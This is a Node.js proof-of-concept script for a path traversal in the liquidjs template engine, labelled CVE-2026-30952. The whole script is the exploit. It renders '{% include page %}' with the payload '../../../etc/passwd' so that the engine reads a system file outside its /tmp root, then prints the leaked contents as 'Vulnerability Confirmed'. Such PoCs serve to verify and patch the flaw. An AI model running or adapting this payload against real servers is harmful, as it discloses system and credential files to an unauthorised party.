const { Liquid } = require('liquidjs');
const fs = require('fs');
const path = require('path');

const engine = new Liquid({ 
    root: ['/tmp'], 
    partials: ['/tmp'], 
    dynamicPartials: true 
});

async function runExploit() {
    console.log("\x1b[33m[!] Initializing CVE-2026-30952 Path Traversal PoC...\x1b[0m");

    const payload = { page: '../../../etc/passwd' };
    const template = '{% include page %}';

    console.log(`[+] Attempting to include: ${payload.page}`);
    console.log(`[+] Using template: ${template}`);

    try {
        const output = await engine.parseAndRender(template, payload);
        
        console.log("\n\x1b[32m[SUCCESS] Vulnerability Confirmed! File content leaked:\x1b[0m");
        console.log(output.slice(0, 500)); // Displaying first 500 chars
        console.log("--------------------------------------------------");
        
    } catch (error) {
        console.error("\n\x1b[31m[FAILED] Could not leak file. Check if the file exists or if the version is patched.\x1b[0m");
        console.error(error.message);
    }
}

runExploit();